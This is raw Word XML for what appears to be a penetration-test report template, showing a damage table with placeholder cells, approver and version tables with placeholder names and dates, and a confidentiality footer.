            <w:shd w:val="clear" w:color="auto" w:fill="C0504D" w:themeFill="accent2"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2748D757" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w14:paraId="3CA8655A" w14:textId="77777777" w:rsidTr="00FC7AF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52CCF0F7" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[Host X]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B4515AA" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[Scope]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="445CDDBE" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[Method]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39B3AAB3" w14:textId="77777777" w:rsidR="00FC7AF1" w:rsidRPr="00FC7AF1" w:rsidRDefault="00FC7AF1" w:rsidP="00FC7AF1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC7AF1">
              <w:rPr>
                <w:color w:val="943634" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[Notes]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="108D5B8A" w14:textId="77777777" w:rsidR="006D6C4B" w:rsidRDefault="006D6C4B" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="20A3BF02" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="6E0C18BB" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="492EA343" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="5AB593EC" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="19B3FEE0" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="6D4E45F6" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="76CCC74E" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="092F4E70" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="2C1BEDB6" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRPr="006D6C4B" w:rsidRDefault="00A836BD" w:rsidP="006D6C4B"/>
    <w:p w14:paraId="69436C1C" w14:textId="3192A4D9" w:rsidR="00475B86" w:rsidRPr="001D73CA" w:rsidRDefault="00A836BD" w:rsidP="001D73CA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc178499005"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="001D73CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00966C99" w:rsidRPr="001D73CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="001D73CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00966C99" w:rsidRPr="001D73CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Additional </w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="001D73CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ENGAGEMENT INFORMATION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="5A9763CF" w14:textId="0946C493" w:rsidR="00475B86" w:rsidRPr="00976831" w:rsidRDefault="00966C99" w:rsidP="001D73CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc177321918"/>
      <w:r w:rsidRPr="00976831">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Approves</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="00976831">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>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475B86" w14:paraId="117536E3" w14:textId="77777777" w:rsidTr="1F04327A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CDCDCC7" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="400EC3AA" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;CLIENT NAME&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="365FDD7E" w14:textId="77777777" w:rsidTr="1F04327A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3BC99D20" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Approvers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="409D9D4E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="1F04327A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The following people are authorized to change the scope of engagement and modify the terms of the engagement</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A89A84" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;PERSON NAME 1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="543CAA58" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="00BF2874">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;PERSON NAME 2&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16C0F75A" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="03DE039A" w14:textId="77777777" w:rsidR="00475B86" w:rsidRPr="00976831" w:rsidRDefault="00922DBC" w:rsidP="00976831">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc177321919"/>
      <w:r w:rsidRPr="00976831">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Version Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>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75B86" w14:paraId="1E7523DC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="773CDE7E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="753086C6" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61AF55A2" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00475B86" w14:paraId="06A88778" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0EED7A01" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="476E2BFD" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;DATE HERE&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="689A6884" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Initial report to client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A61AF35" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:sectPr w:rsidR="00475B86">
      <w:headerReference w:type="default" r:id="rId15"/>
      <w:footerReference w:type="default" r:id="rId16"/>
      <w:footerReference w:type="first" r:id="rId17"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720"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4B0F9" w14:textId="77777777" w:rsidR="007C04E3" w:rsidRDefault="007C04E3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6F7AA85F" w14:textId="77777777" w:rsidR="007C04E3" w:rsidRDefault="007C04E3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="6859FF8B" w14:textId="77777777" w:rsidR="007C04E3" w:rsidRDefault="007C04E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Proxima Nova">
    <w:altName w:val="Tahoma"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto">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9542E" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="1F04327A" w:rsidP="1F04327A">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="8280"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="1F04327A">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>&lt;CLIENT NAME&gt; CONFIDENTIAL</w:t>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="1F04327A">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidR="00922DBC" w:rsidRPr="1F04327A">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00922DBC" w:rsidRPr="1F04327A">
      <w:rPr>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="1F04327A">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00922DBC" w:rsidRPr="1F04327A">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="666666"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00922DBC">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658242" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="784A4A66" wp14:editId="5515166D">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-1390649</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>422565</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="8515350" cy="320385"/>
              <wp:effectExtent l="0" t="0" r="0" b="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89400" y="1346650"/>
                        <a:ext cx="10843200" cy="223500"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="3E29A87C"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84A4A66" id="Rectangle 2" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:-109.5pt;margin-top:33.25pt;width:670.5pt;height:25.25pt;z-index:25165824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" fillcolor="#009ddc" stroked="f">
              <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                <w:txbxContent>
                  <w:p w14:paraId="3E29A87C" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                      <w:textDirection w:val="btLr"/>
                    </w:pP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A1CEC" w14:textId="653859FB" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Sensitive</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">: The information in this document is strictly confidential and is intended for </w:t>
    </w:r>
    <w:r w:rsidR="00DF583C">
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Client</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7E4487AF" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="66666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39EA7" w14:textId="77777777" w:rsidR="007C04E3" w:rsidRDefault="007C04E3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F23B4A3" w14:textId="77777777" w:rsidR="007C04E3" w:rsidRDefault="007C04E3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="2769D3CA" w14:textId="77777777" w:rsidR="007C04E3" w:rsidRDefault="007C04E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977A1" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:i/>
        <w:color w:val="666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="67260734" wp14:editId="38EF3E91">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>152400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="952500" cy="59004"/>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5443000" y="1647850"/>
                        <a:ext cx="1059000" cy="48600"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:srgbClr val="009DDC"/>
                      </a:solidFill>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="250A38AE"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7260734" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:12pt;width:75pt;height:4.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" fillcolor="#009ddc" stroked="f">
              <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                <w:txbxContent>
                  <w:p w14:paraId="250A38AE" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
                    <w:pPr>
                      <w:spacing w:line="240" w:lineRule="auto"/>
                      <w:textDirection w:val="btLr"/>
                    </w:pPr>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="square"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
